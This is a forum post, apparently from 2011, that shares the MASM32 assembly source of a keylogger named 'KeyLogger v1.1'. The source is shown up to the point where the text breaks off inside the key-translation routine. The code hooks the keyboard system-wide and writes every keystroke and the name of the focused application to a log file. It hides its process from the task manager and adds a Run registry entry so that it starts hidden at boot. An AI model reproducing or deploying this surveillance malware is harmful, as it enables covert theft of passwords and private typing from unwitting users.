Nytro Posted April 6, 2011 Report Posted April 6, 2011 KeyLogger v1.1by J. Daniel PinoOld stuff... Cu Keyboard Hook, e interesant, bine de uitat peste el.;************************************************************************************************;KeyLogger v1.1 by J. Daniel Pino - ;;Daniel_2ar@hotmail.com;Daniel_2ar@yahoo.com;Daniel_2@speedy.com.ar;Daniel_2@data54.com;;I hope you find this stuff useful!;************************************************************************************************.386.MODEL FLAT, STDCALLOPTION CASEMAP:NONE;******************************************************************************************************************* ;Includes;******************************************************************************************************************* INCLUDE C:\MASM32\INCLUDE\WINDOWS.INCINCLUDE C:\MASM32\INCLUDE\KERNEL32.INCINCLUDE C:\MASM32\INCLUDE\USER32.INCINCLUDE C:\MASM32\INCLUDE\COMCTL32.INCINCLUDE C:\MASM32\INCLUDE\ADVAPI32.INCINCLUDE C:\MASM32\INCLUDE\MASM32.INCINCLUDE C:\KeyLogV1-1_source_code\HKL_DLL\HKL.INCINCLUDELIB C:\MASM32\LIB\KERNEL32.LIBINCLUDELIB C:\MASM32\LIB\USER32.LIBINCLUDELIB C:\MASM32\LIB\COMCTL32.LIBINCLUDELIB C:\MASM32\LIB\ADVAPI32.LIBINCLUDELIB C:\MASM32\LIB\MASM32.LIBINCLUDELIB C:\KeyLogV1-1_source_code\HKL_DLL\HKL.LIB;*******************************************************************************************************************; Prototypes;*******************************************************************************************************************dlgmain PROTO :DWORD, :DWORD, :DWORD, :DWORDRunParameters PROTO addr_cmd_params:DWORDCreateLogFile PROTOSetFilePath PROTOWriteDateStamp PROTOGetDateStamp PROTO addr_buffer:DWORDWriteAppInfoHeader PROTO appnamelen:DWORDWriteKeyPressed PROTO virtualkeycode:DWORDTranslateVirtualKeyCode PROTO virtualkeycode:DWORD, addr_buffer:DWORDdlgabout PROTO :DWORD, :DWORD, :DWORD, :DWORDHideProcess PROTO;*******************************************************************************************************************; Macros;*******************************************************************************************************************;This macro search a char in a string. If it finds it, returns in EAX the address of the char;in the string; else, returns NULL in EAX.;;Esta macro busca un caracter en una cadena. Si lo encuentra, devuelve en EAX la direccion ;donde se encuentra el caracter en la cadena; de lo contrario, devuelve NULL en EAX.;*******************************************************************************************************************FindCharInStr MACRO char_to_find:REQ, p_string:REQ, len_string:REQ LOCAL not_found, return CLD MOV AL, char_to_find MOV ECX, len_string PUSH EDI MOV EDI, p_string REPNE SCASB JNZ not_found DEC EDI MOV EAX, EDI POP EDI JMP returnnot_found: POP EDI XOR EAX, EAX return: ENDM ;******************************************************************************************************************* .DATA;*******************************************************************************************************************classname DB "Daniel", 0dlgname DB "Daniel", 0CommandLine LPSTR 0aboutdlgname DB "ABOUTDLG", 0err_cap DB "Error", 0err0 DB "Error while trying to install hook.", 0err1 DB "Error while trying to uninstall hook.", 0previnstance_err DB "Only one instance of KeyLog can run at a time.", 0previnstance_cap DB "KeyLog V1.1", 0button0_cap0 DB "Activate", 0button0_cap1 DB "Deactivate", 0;En la siguiente variable se almacenara la direccion de la ruta y nombre de la aplicacion sobre ;la cual se esta tipeandoaddr_app_name DWORD 0;En la siguiente matriz de bytes se almacenara la ruta y nombre de la aplicacion que tenia el;focoprev_app_name DB 300 DUP (0);Esta variable determina el estado del programa (visible (1) - oculto (0))hidden_mode DWORD 1;---------------------------------------;Variables para el archivo de registro;---------------------------------------h_keylogfile DWORD 0keylogfilepath DB "X:\Klgf.txt", 0keylogfile_err DB "Unable to create log file. KeyLogger will exit now", 0keylogfilestamp DB "KeyLog Version 1.1 - Started on: ", 0keylogfilestok DWORD TRUEkeylogfilebuff DB 200 DUP (0)arethereparameters DWORD 0;cmd_token DB "-", 0date DB "MMMM',' dddd dd yyyy", 0time DB "hh':'mm tt", 0line_1 DB "**************************************************",0line_2 DB "--------------------------------------------------", 0infoheader_f1 DB "Application: ", 0infoheader_f2 DB "got focus on: ", 0infoheader_f3 DB "user type: ", 0first_app_hooked DWORD TRUE ;---------------------------------------;Windows' registry variables;Variables para el registro de Windows;---------------------------------------h_regkey DWORD 0subkey DB "Software\Microsoft\Windows\CurrentVersion\run", 0subkey_descrp DB "KeyLogRegEntry", 0keylog_params DB "-ah", 0;-------------------------------------;Strings for special keys;Cadenas para las teclas especiales;-------------------------------------k_escape DB "[ESC]", 0k_tab DB "[TAB]", 0k_f1 DB "[F1]", 0k_f2 DB "[F2]", 0k_f3 DB "[F3]", 0k_f4 DB "[F4]", 0k_f5 DB "[F5]", 0k_f6 DB "[F6]", 0k_f7 DB "[F7]", 0k_f8 DB "[F8]", 0k_f9 DB "[F9]", 0k_f10 DB "[F10]", 0k_f11 DB "[F11]", 0k_f12 DB "[F12]", 0k_printscreen DB "[PRINTSCREEN]", 0k_scrolllock DB "[SCROLLLOCK]", 0k_break DB "[BREAK]", 0k_insert DB "[INSERT]", 0k_home DB "[HOME]", 0k_pageup DB "[PAGEUP]", 0k_delete DB "[DELETE]", 0k_end DB "[END]", 0k_pagedown DB "[PAGEDOWN]", 0k_back DB "[BACK]", 0k_capslock DB "[CAPSLOCK]", 0k_numlock DB "[NUMLOCK]", 0k_shift DB "[SHIFT]", 0k_control DB "[CONTROL]", 0k_alt DB "[ALT]", 0k_left DB "[LEFT]", 0k_up DB "[UP]", 0k_right DB "[RIGHT]", 0k_down DB "[DOWN]", 0k_numpad0 DB "[NUMPAD 0]", 0k_numpad1 DB "[NUMPAD 1]", 0k_numpad2 DB "[NUMPAD 2]", 0k_numpad3 DB "[NUMPAD 3]", 0k_numpad4 DB "[NUMPAD 4]", 0k_numpad5 DB "[NUMPAD 5]", 0k_numpad6 DB "[NUMPAD 6]", 0k_numpad7 DB "[NUMPAD 7]", 0k_numpad8 DB "[NUMPAD 8]", 0k_numpad9 DB "[NUMPAD 9]", 0k_unknown DB "[UNKNOWN]", 0kernel_name DB "KERNEL32.DLL", 0kernel_function DB "RegisterServiceProcess", 0buffer DB 100 DUP (0);******************************************************************************************************************* .DATA?;*******************************************************************************************************************hInstance DWORD ?h_Dlg DWORD ?hButton0 DWORD ?hButton1 DWORD ?;***************************************************;Controls' handles variables;Variables para los manejadores de los controles;***************************************************;Push buttons;---------------------------------------------------h_IDC_BUTTON0 DWORD ?h_IDC_BUTTON1 DWORD ?;******************************************************************************************************************* .CONST;*******************************************************************************************************************;Push buttons;---------------------------------------------------IDC_BUTTON0 EQU 400IDC_BUTTON1 EQU 401IDC_BUTTON2 EQU 402IDC_BUTTON3 EQU 403IDC_CHECK00 EQU 500;---------------------------------------------------;User messages;Mensajes personalizados;---------------------------------------------------WM_KEYSTROKE EQU WM_USER + 2 WM_KEYLOGMSG EQU WM_USER + 3;******************************************************************************************************************* .CODE;*******************************************************************************************************************start: INVOKE GetModuleHandle, NULL MOV hInstance, EAX INVOKE GetCommandLine INVOKE dlgmain, hInstance, NULL, NULL, SW_SHOWDEFAULT INVOKE ExitProcess, 0;*******************************************************************************************************************;*******************************************************************************************************************dlgmain PROC hInst:HINSTANCE, hPrevInst:HINSTANCE, CmdLine:LPSTR, CmdShow:DWORD LOCAL wc:WNDCLASSEX, msg:MSG, hDlg:HWND, cmd_params[50]:BYTE; ;--------------------------------------------------------------------- ;We check whether an instance of this program is already running ;Se determina si ya se esta ejecutando una instancia del programa ;--------------------------------------------------------------------- INVOKE FindWindow, ADDR classname, NULL .IF EAX != NULL INVOKE MessageBox, NULL, ADDR previnstance_err, ADDR previnstance_cap, MB_ICONERROR INVOKE ExitProcess, NULL .ENDIF MOV wc.cbSize, SIZEOF WNDCLASSEX MOV wc.style, CS_HREDRAW or CS_VREDRAW MOV wc.lpfnWndProc, OFFSET dlgproc MOV wc.cbClsExtra, NULL MOV wc.cbWndExtra, DLGWINDOWEXTRA PUSH hInst POP wc.hInstance MOV wc.hbrBackground, COLOR_BTNFACE+1 MOV wc.lpszMenuName, NULL MOV wc.lpszClassName, OFFSET classname INVOKE LoadIcon, hInst, NULL MOV wc.hIcon, EAX MOV wc.hIconSm, EAX INVOKE LoadCursor, NULL, IDC_ARROW MOV wc.hCursor, EAX INVOKE RegisterClassEx, addr wc INVOKE CreateDialogParam, hInstance, ADDR dlgname, NULL, NULL, NULL MOV hDlg, EAX MOV h_Dlg, EAX INVOKE InitCommonControls ;Se obtiene el manejador del boton "Hide" INVOKE GetDlgItem, h_Dlg, IDC_BUTTON1 MOV h_IDC_BUTTON1, EAX ;Se intentara esconder el programa de la lista de procesos de Windows ;We'll try to hide the program from the Windows' task manager INVOKE HideProcess ;--------------------------------------------------------------------- ; We check whether the program should be run at Windows' start up ; Se determina si el programa se ejecuta el iniciar Windows ;--------------------------------------------------------------------- ;The registry key is open to check whether it is already created ;Se abre la clave para determinar la existencia de la subclave INVOKE RegOpenKeyEx, HKEY_LOCAL_MACHINE, ADDR subkey, NULL, KEY_ALL_ACCESS, ADDR h_regkey .IF EAX == ERROR_SUCCESS ;If it is ;we look for the subkey INVOKE RegQueryValueEx, h_regkey, ADDR subkey_descrp, NULL, NULL, NULL, NULL .IF EAX == ERROR_SUCCESS ;If it does exist ;Se tilda el boton AUTOCHECKBOX INVOKE CheckDlgButton, hDlg, IDC_CHECK00, BST_CHECKED .ENDIF ;The key is closed INVOKE RegCloseKey, h_regkey .ENDIF ;--------------------------------------------------------------------- ; We take out the application path in the command line the in order ; to get the parameters only ; Se limpia la linea de comandos por posibles parametros ;--------------------------------------------------------------------- INVOKE GetCommandLine MOV CommandLine, EAX INVOKE StripRangeI, CommandLine, ADDR cmd_params, 22h, 22h ;Any parameter found in the command line is executed ;Se ejecuta cualquier parametro en la linea de comandos ;y se determina si se muestra o no la ventana INVOKE RunParameters, ADDR cmd_params ;--------------------------------------------------------------------- .WHILE TRUE INVOKE GetMessage, ADDR msg,NULL,0,0 .BREAK .IF (!EAX) ;Si EAX = 0 INVOKE IsDialogMessage, hDlg, ADDR msg .IF EAX == FALSE INVOKE TranslateMessage, ADDR msg INVOKE DispatchMessage, ADDR msg .ENDIF .ENDW MOV EAX, msg.wParam RET dlgmain ENDP;*******************************************************************************************************************;Este funcion se encarga de recibir, interpretar y actuar de acuerdo a los mensajes que le ;corresponan.;*******************************************************************************************************************dlgproc PROC hDlg:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM LOCAL temp_buffer:DWORD .IF uMsg == WM_DESTROY ;Se cierra el archivo de registro INVOKE CloseHandle, h_keylogfile INVOKE PostQuitMessage, NULL .ELSEIF uMsg == WM_COMMAND MOV EAX, wParam .IF AX == IDC_BUTTON0 SHR EAX, 16 .IF AX == BN_CLICKED INVOKE GetCurrentState .IF EAX == 0 INVOKE CreateLogFile .IF EAX != 0 INVOKE MessageBox, hDlg, ADDR keylogfile_err, ADDR err_cap, MB_ICONERROR ;Se termina el programa INVOKE ExitProcess, NULL .ENDIF INVOKE StartKeyLogHooking, hDlg .IF EAX == -1 INVOKE MessageBox, hDlg, ADDR err0, ADDR err_cap, MB_ICONERROR .ELSE ;Se guarda la direccion del buffer que devuelve la funcion ;ya que es alli donde se almacenara el nombre de la ;aplicacion sobre la cual se esta tipeando MOV addr_app_name, EAX ;Se cambia el titulo del boton "Activar" por "Desactivar" INVOKE SendDlgItemMessage, hDlg, IDC_BUTTON0, WM_SETTEXT, NULL, ADDR button0_cap1 .ENDIF ;The Hide button is disabled INVOKE EnableWindow, h_IDC_BUTTON1, TRUE .ELSEIF EAX == 1 ;Se cierra el archivo de registro INVOKE CloseHandle, h_keylogfile INVOKE StopKeyLogHooking .IF EAX == -1 INVOKE MessageBox, hDlg, ADDR err1, ADDR err_cap, MB_ICONERROR .ELSE INVOKE SendDlgItemMessage, hDlg, IDC_BUTTON0, WM_SETTEXT, NULL, ADDR button0_cap0 .ENDIF ;The Hide button is disabled INVOKE EnableWindow, h_IDC_BUTTON1, NULL .ENDIF .ENDIF .ELSEIF AX == IDC_BUTTON1 INVOKE ShowWindow, hDlg, SW_HIDE AND hidden_mode, 0 .ELSEIF AX == IDC_BUTTON2 SHR EAX, 16 .IF AX == BN_CLICKED INVOKE DialogBoxParam, hInstance, ADDR aboutdlgname, hDlg, OFFSET dlgabout, NULL .ENDIF .ELSEIF AX == IDC_CHECK00 SHR EAX, 16 .IF AX == BN_CLICKED INVOKE IsDlgButtonChecked, hDlg, IDC_CHECK00 .IF EAX == BST_CHECKED AND temp_buffer, 0 ;Se determina la ruta donde se encuentra este programa INVOKE GlobalAlloc, GPTR, 1000 MOV temp_buffer, EAX INVOKE GetCommandLine INVOKE lstrcpy, temp_buffer, EAX INVOKE szCatStr, temp_buffer, ADDR keylog_params ;Se crea o abre la clave en el registro INVOKE RegCreateKeyEx, HKEY_LOCAL_MACHINE, ADDR subkey, NULL, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, ADDR h_regkey, NULL INVOKE lstrlen, temp_buffer ;We set the subkey values ;Se establecen los valores de la subclave INVOKE RegSetValueEx, h_regkey, ADDR subkey_descrp, NULL, REG_SZ, temp_buffer, EAX ;The memory is deallocated ;Se libera la memoria INVOKE GlobalFree, temp_buffer ;The key is closed INVOKE RegCloseKey, h_regkey .ELSE ;The key is open in order to delete the subkey ;Se abre la clave para luego eliminar la subclave INVOKE RegOpenKeyEx, HKEY_LOCAL_MACHINE, ADDR subkey, NULL, KEY_ALL_ACCESS, ADDR h_regkey .IF EAX == ERROR_SUCCESS ;Si la clave existe ;Se elimina la subclave INVOKE RegDeleteValue, h_regkey, ADDR subkey_descrp ;The key is closed INVOKE RegCloseKey, h_regkey .ENDIF .ENDIF .ENDIF .ENDIF .ELSEIF uMsg == WM_KEYLOGMSG .IF hidden_mode == 1 INVOKE ShowWindow, hDlg, SW_HIDE AND hidden_mode, 0 .ELSE INVOKE ShowWindow, hDlg, SW_SHOW MOV hidden_mode, 1 ;We put the KeyLog's windows on top INVOKE SetForegroundWindow, hDlg .ENDIF .ELSEIF uMsg == WM_KEYSTROKE ;Applications' names are compared so that we can determine whether ;a new application has the focus INVOKE lstrcmp, ADDR prev_app_name, addr_app_name .IF EAX != 0 ;The info header is written for the new application that ;got the focus INVOKE WriteAppInfoHeader, lParam ;The new application's name is stored for subsequent comparisons INVOKE lstrcpy, ADDR prev_app_name, addr_app_name .ENDIF ;The procedure which will write the key pressed into the file is invoked INVOKE WriteKeyPressed, wParam .ELSE INVOKE DefWindowProc, hDlg, uMsg, wParam, lParam RET .ENDIF XOR EAX, EAX RETdlgproc ENDP;*******************************************************************************************************************;This procedure examines and executes any parameters passed to the program when it was run.;Este procedimiento examina y ejecuta los distintos parametros que puden pasarse al programa;en el momento de su ejecucion.;*******************************************************************************************************************RunParameters PROC USES EBX addr_cmd_params:DWORD ;Se examina la linea de comando en busca del token (" -") de parametros MOV EBX, addr_cmd_params MOV AX, WORD PTR [EBX] .IF AX != "- " ;Si no se encuentra el guion que antecede a los parametros JMP quit .ENDIF ;------------------------------------------------------------------------------ ;"Activate" parameter ('a') ;------------------------------------------------------------------------------ ;Se busca el parametro 'a' (activate) FindCharInStr 'a', addr_cmd_params, 49 .IF EAX != NULL INVOKE CreateLogFile .IF EAX != 0 INVOKE MessageBox, h_Dlg, ADDR keylogfile_err, ADDR err_cap, MB_ICONERROR ;The program is finished INVOKE ExitProcess, NULL .ENDIF INVOKE StartKeyLogHooking, h_Dlg .IF EAX == -1 INVOKE MessageBox, h_Dlg, ADDR err0, ADDR err_cap, MB_ICONERROR .ELSE ;We save the address of the buffer returned by the function ;since it's there where the application's name onto which the ;user is typing will be stored ;Se guarda la direccion del buffer que devuelve la funcion ;ya que es alli donde se almacenara el nombre de la ;aplicacion sobre la cual se esta tipeando MOV addr_app_name, EAX ;We change the button caption from "Activate" to "Deactivate" ;Se cambia el titulo del boton "Activar" por "Desactivar" INVOKE SendDlgItemMessage, h_Dlg, IDC_BUTTON0, WM_SETTEXT, NULL, ADDR button0_cap1 .ENDIF ;The Hide button is disabled INVOKE EnableWindow, h_IDC_BUTTON1, TRUE ;------------------------------------------------------------------------------ ;"Hide" parameter('h') ;------------------------------------------------------------------------------ ;We look for paramter 'h' (hide) ;Se busca el parametro 'h' (hide) FindCharInStr 'h', addr_cmd_params, 49 .IF EAX != NULL RET .ENDIF ;------------------------------------------------------------------------------ .ENDIFquit: INVOKE ShowWindow, h_Dlg, SW_SHOWNORMAL INVOKE UpdateWindow, h_Dlg RETRunParameters ENDP;*******************************************************************************************************************;This function creates the file (or opens the existing one) which will store all the keys;being pressed, along with any other info of the application that got the focus.;If it success, return NULL; else, returns -1 (0FFFFFFFFh).;Esta funcion se encarga de crear el archivo (o abrir el existente) donde se escribira el ;registro de las teclas pulsadas junto con algunos datos de la aplicacion que tiene el foco.;Si tuvo exito, devuelve cero; de lo contrario, devuelve -1 (0FFFFFFFFh).;*******************************************************************************************************************CreateLogFile PROC ;We set the application path ;Se establece la ruta del archivo INVOKE SetFilePath ;The registry file is created, or the existing one is open ;Se crea o se abre el archivo de registro donde se almacenaran los datos INVOKE CreateFile, ADDR keylogfilepath, GENERIC_READ OR GENERIC_WRITE, NULL, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL .IF EAX == INVALID_HANDLE_VALUE MOV EAX, -1 RET .ENDIF ;The file's handle is saved ;Se guarda el manejador del archivo MOV h_keylogfile, EAX ;If the keyboard login is started, write DateStamp ;Si se inicia la apliacion, escribir el DateStamp .IF keylogfilestok == TRUE INVOKE WriteDateStamp .ENDIF XOR EAX, EAX RETCreateLogFile ENDP;*******************************************************************************************************************;This function determines the path of the registry file by checking all the drives available;in the system.;Esta funcion determina la ruta del archivo de registro del programa (KlgF.txt) examinando;las unidades disponibles en el sistema;*******************************************************************************************************************SetFilePath PROC USES EBX LOCAL driver_letter[4]:BYTE MOV DWORD PTR [driver_letter], " \:C" AND driver_letter[3], 0 INVOKE GetLogicalDrives MOV EBX, EAX SHR EBX, 2 ;Skip test for drives A: & B: .WHILE EBX > 0 SHR EBX, 1 INVOKE GetDriveType, ADDR driver_letter .IF EAX == DRIVE_FIXED .BREAK .ENDIF INC driver_letter .ENDW MOV AL, BYTE PTR [driver_letter] MOV BYTE PTR [keylogfilepath], AL RETSetFilePath ENDP;*******************************************************************************************************************;This procedure writes the session header every time the program is run.;Este procedimiento se encarga de escribir el encabezado de sesion del programa cada vez que se ;ejecuta.;*******************************************************************************************************************WriteDateStamp PROC LOCAL bytes_written:DWORD, temp:DWORD AND temp, 0 ;If the program is run for the first time, write DateStamp ;Si se ejecuta la primera vez el programa, escribir el DateStamp .IF keylogfilestok == TRUE ;The file pointer is set to the end of the file in order to avoid ;overwriting any other data ;Se posiciona el puntero del archivo final para evitar sobreescribir los ;datos que pueda tener INVOKE SetFilePointer, h_keylogfile, NULL, NULL, FILE_END ;We write the Enter key chars ;Se escribe el Enter mas el retorno de carro MOV EBX, OFFSET keylogfilebuff MOV WORD PTR [EBX], 0A0Dh INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL ;An asterisk-line separator is written ;Se escribe la linea separadora de asteriscos INVOKE WriteFile, h_keylogfile, ADDR line_1, 50, ADDR bytes_written, NULL INVOKE WriteFile, h_keylogfile, ADDR line_1, 50, ADDR bytes_written, NULL ;We write the Enter key chars (0Dh - 0Ah) ;Se escribe el Enter mas el retorno de carro MOV EBX, OFFSET keylogfilebuff MOV WORD PTR [EBX], 0A0Dh INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL ;KeyLog header ;Encabezado de presentacion INVOKE WriteFile, h_keylogfile, ADDR keylogfilestamp, 33, ADDR bytes_written, NULL INVOKE GetDateStamp, ADDR keylogfilebuff MOV temp, EAX INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, temp, ADDR bytes_written, NULL ;We write the Enter key chars (0Dh - 0Ah) ;Se escribe el Enter mas el retorno de carro MOV EBX, OFFSET keylogfilebuff MOV WORD PTR [EBX], 0A0Dh INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL ;An asterisk-line separator is written ;Se escribe la linea separadora de asteriscos INVOKE WriteFile, h_keylogfile, ADDR line_1, 50, ADDR bytes_written, NULL INVOKE WriteFile, h_keylogfile, ADDR line_1, 50, ADDR bytes_written, NULL ;The keylogfilestok variable is reset in order not to write the KeyLog ;header again ;Se resetea la variable para que no se vuelva a escribir el DateStamp AND keylogfilestok, 0 .ENDIF RETWriteDateStamp ENDP;*******************************************************************************************************************;This function stores into the buffer (whose address is received as a parameter) the string;of the date and time. Returns the length of that string.;Esta funcion se encarga de almacenar en el buffer (cuya direccion recibe como parametro);los caracteres correspondientes a la fecha y hora. Devuelve el largo de la cadena en EAX.;*******************************************************************************************************************GetDateStamp PROC addr_buffer:DWORD LOCAL cont:DWORD ;The local variable cont is reset ;Se resetea la variable local AND cont, 0 ;-------------- ; Date ;-------------- INVOKE GetDateFormat, NULL, NULL, NULL, ADDR date, addr_buffer, 200 ;EAX is decremented in one in order not to include the NULL character of the ;string DEC EAX ADD cont, EAX ;A separator is written ;Se escribe un separador ADD addr_buffer, EAX MOV EBX, addr_buffer MOV BYTE PTR [EBX], ' ' INC addr_buffer INC cont MOV WORD PTR [EBX +1], ' -' INC cont INC cont INC addr_buffer INC addr_buffer ;-------------- ; Time ;-------------- INVOKE GetTimeFormat, NULL, NULL, NULL, ADDR time, addr_buffer, 200 ;EAX is decremented in one in order not to include the NULL character of the ;string ;Se decrementa en 1 EAX para que no quede incluido el cero de fin de cadena ;en la cadena de texto DEC EAX ADD addr_buffer, EAX ADD cont, EAX MOV EAX, cont RETGetDateStamp ENDP;*******************************************************************************************************************;This procedure writes the info header in the KeyLog file. It's invoked whenever an application;gets the focus.;*******************************************************************************************************************WriteAppInfoHeader PROC appnamelen:DWORD LOCAL bytes_written:DWORD, temp:DWORD ;The file pointer is set to the end of the file in order to avoid ;overwriting any other data ;Se posiciona el puntero del archivo final para evitar sobreescribir los ;datos que pueda tener INVOKE SetFilePointer, h_keylogfile, NULL, NULL, FILE_END ;Code for the second line separator .IF first_app_hooked == TRUE AND first_app_hooked, 0 .ELSE ;We write the Enter key chars (0Dh - 0Ah) ;Se escribe el Enter mas el retorno de carro MOV EBX, OFFSET keylogfilebuff MOV WORD PTR [EBX], 0A0Dh INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL ;A dash line separator is written ;Se escribe la linea separadora de guiones INVOKE WriteFile, h_keylogfile, ADDR line_2, 50, ADDR bytes_written, NULL INVOKE WriteFile, h_keylogfile, ADDR line_2, 50, ADDR bytes_written, NULL .ENDIF ;We write the Enter key chars (0Dh - 0Ah) ;Se escribe el Enter mas el retorno de carro MOV EBX, OFFSET keylogfilebuff MOV WORD PTR [EBX], 0A0Dh INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL ;The info header field 1 is written INVOKE WriteFile, h_keylogfile, ADDR infoheader_f1, 13, ADDR bytes_written, NULL ;The application path and name is written: INVOKE WriteFile, h_keylogfile, addr_app_name, appnamelen, ADDR bytes_written, NULL ;We write the Enter key chars (0Dh - 0Ah) ;Se escribe el Enter mas el retorno de carro MOV EBX, OFFSET keylogfilebuff MOV WORD PTR [EBX], 0A0Dh INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL ;The info header field 1 is written INVOKE WriteFile, h_keylogfile, ADDR infoheader_f2, 14, ADDR bytes_written, NULL INVOKE GetDateStamp, ADDR keylogfilebuff MOV temp, EAX INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, temp, ADDR bytes_written, NULL ;We write the Enter key chars (0Dh - 0Ah) ;Se escribe el Enter mas el retorno de carro MOV EBX, OFFSET keylogfilebuff MOV WORD PTR [EBX], 0A0Dh INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL ;The info header field 1 is written INVOKE WriteFile, h_keylogfile, ADDR infoheader_f3, 11, ADDR bytes_written, NULL ;We write the Enter key chars (0Dh - 0Ah) ;Se escribe el Enter mas el retorno de carro MOV EBX, OFFSET keylogfilebuff MOV DWORD PTR [EBX], 0A0D0A0Dh INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 4, ADDR bytes_written, NULL RETWriteAppInfoHeader ENDP;*******************************************************************************************************************;This procedure writes into the file the keys pressed by the user;*******************************************************************************************************************WriteKeyPressed PROC virtualkeycode:DWORD LOCAL bytes_written:DWORD, len_string:DWORD INVOKE TranslateVirtualKeyCode, virtualkeycode, ADDR keylogfilebuff MOV len_string, EAX ;The file pointer is set to the end of the file in order to avoid ;overwriting any other data ;Se posiciona el puntero del archivo final para evitar sobreescribir los ;datos que pueda tener INVOKE SetFilePointer, h_keylogfile, NULL, NULL, FILE_END ;The character typed by the user is written INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, len_string, ADDR bytes_written, NULL RETWriteKeyPressed ENDP;*******************************************************************************************************************;This function translates the virtual code of a key being pressed into its name. The result is ;saved into a buffer whose address is received as a parameter. Returns the length of the name of;the key's name.;Esta funcion se encarga de traducir el codigo virtual de una tecla presionada. El resultado;lo deposita en el buffer cuya direccion recibe en el segundo parametro. Devuelve el largo;de la cadena traducida resultante.;*******************************************************************************************************************TranslateVirtualKeyCode PROC virtualkeycode:DWORD, addr_buffer:DWORD LOCAL len_string:DWORD ;Local variables are reset AND len_string, 0 MOV EAX, virtualkeycode ;If the virtual code of the key is between "A" (41h) and "Z" (54h) ;Si el codigo virtual de la tecla esta entre "A" (41h) y "Z" (54h) .IF EAX >= 41h && EAX <= 5Ch ;We check whether the Caps Lock key is activated ;Se determinara si la tecla "Bloq Mayus" esta activada INVOKE GetKeyState, VK_CAPITAL .IF EAX == NULL ADD virtualkeycode, 20h .ENDIF MOV EAX, virtualkeycode MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL ;The string of the key's name is 1 byte in length ;El largo de la cadena es de un byte MOV len_string, 1 .ELSEIF EAX == VK_ESCAPE INVOKE lstrcpy, addr_buffer, ADDR k_escape MOV len_string, 5 .ELSEIF EAX == VK_TAB INVOKE lstrcpy, addr_buffer, ADDR k_tab MOV len_string, 5 .ELSEIF EAX == VK_F1 INVOKE lstrcpy, addr_buffer, ADDR k_f1 MOV len_string, 4 .ELSEIF EAX == VK_F2 INVOKE lstrcpy, addr_buffer, ADDR k_f2 MOV len_string, 4 .ELSEIF EAX == VK_F3 INVOKE lstrcpy, addr_buffer, ADDR k_f3 MOV len_string, 4 .ELSEIF EAX == VK_F4 INVOKE lstrcpy, addr_buffer, ADDR k_f4 MOV len_string, 4 .ELSEIF EAX == VK_F5 INVOKE lstrcpy, addr_buffer, ADDR k_f5 MOV len_string, 4 .ELSEIF EAX == VK_F6 INVOKE lstrcpy, addr_buffer, ADDR k_f6 MOV len_string, 4 .ELSEIF EAX == VK_F7 INVOKE lstrcpy, addr_buffer, ADDR k_f7 MOV len_string, 4 .ELSEIF EAX == VK_F8 INVOKE lstrcpy, addr_buffer, ADDR k_f8 MOV len_string, 4 .ELSEIF EAX == VK_F9 INVOKE lstrcpy, addr_buffer, ADDR k_f9 MOV len_string, 4 .ELSEIF EAX == VK_F10 INVOKE lstrcpy, addr_buffer, ADDR k_f10 MOV len_string, 5 .ELSEIF EAX == VK_F11 INVOKE lstrcpy, addr_buffer, ADDR k_f11 MOV len_string, 5 .ELSEIF EAX == VK_F12 INVOKE lstrcpy, addr_buffer, ADDR k_f12 MOV len_string, 5 .ELSEIF EAX == VK_SNAPSHOT INVOKE lstrcpy, addr_buffer, ADDR k_printscreen MOV len_string, 13 .ELSEIF EAX == VK_SCROLL INVOKE lstrcpy, addr_buffer, ADDR k_scrolllock MOV len_string, 12 ;(13h) ;(10h) Virtual-key code for the Break key .ELSEIF EAX == 13h INVOKE lstrcpy, addr_buffer, ADDR k_break MOV len_string, 7 .ELSEIF EAX == VK_INSERT INVOKE lstrcpy, addr_buffer, ADDR k_insert MOV len_string, 8 .ELSEIF EAX == VK_HOME INVOKE lstrcpy, addr_buffer, ADDR k_home MOV len_string, 6 .ELSEIF EAX == VK_PGUP INVOKE lstrcpy, addr_buffer, ADDR k_pageup MOV len_string, 8 .ELSEIF EAX == VK_DELETE INVOKE lstrcpy, addr_buffer, ADDR k_delete MOV len_string, 8 .ELSEIF EAX == VK_END INVOKE lstrcpy, addr_buffer, ADDR k_end MOV len_string, 5 .ELSEIF EAX == VK_PGDN INVOKE lstrcpy, addr_buffer, ADDR k_pagedown MOV len_string, 10 .ELSEIF EAX == VK_SPACE MOV EBX, addr_buffer MOV BYTE PTR [EBX], 20h ;The string of the key's name is 1 byte in length ;El largo de la cadena es de un byte MOV len_string, 1 .ELSEIF EAX == VK_BACK INVOKE lstrcpy, addr_buffer, ADDR k_back MOV len_string, 6 .ELSEIF EAX == VK_CAPITAL INVOKE lstrcpy, addr_buffer, ADDR k_capslock MOV len_string, 10 .ELSEIF EAX == VK_NUMLOCK INVOKE lstrcpy, addr_buffer, ADDR k_numlock MOV len_string, 9 ;(10h) Virtual-key code for the Shit key .ELSEIF EAX == 10h INVOKE lstrcpy, addr_buffer, ADDR k_shift MOV len_string, 7 ;(11h) Virtual-key code for the Control key .ELSEIF EAX == 11h INVOKE lstrcpy, addr_buffer, ADDR k_control MOV len_string, 9 ;(12h) Virtual-key code for the Alt key .ELSEIF EAX == 12h INVOKE lstrcpy, addr_buffer, ADDR k_alt MOV len_string, 5 ;(0Dh) Virtual-key code for the Enter key .ELSEIF EAX == VK_RETURN MOV AX, 0A0Dh MOV EBX, addr_buffer MOV WORD PTR [EBX], AX MOV len_string, 2 ;Numbers .ELSEIF EAX >= 30h && EAX <= 39h MOV EAX, virtualkeycode MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL ;The string of the key's name is 1 byte in length 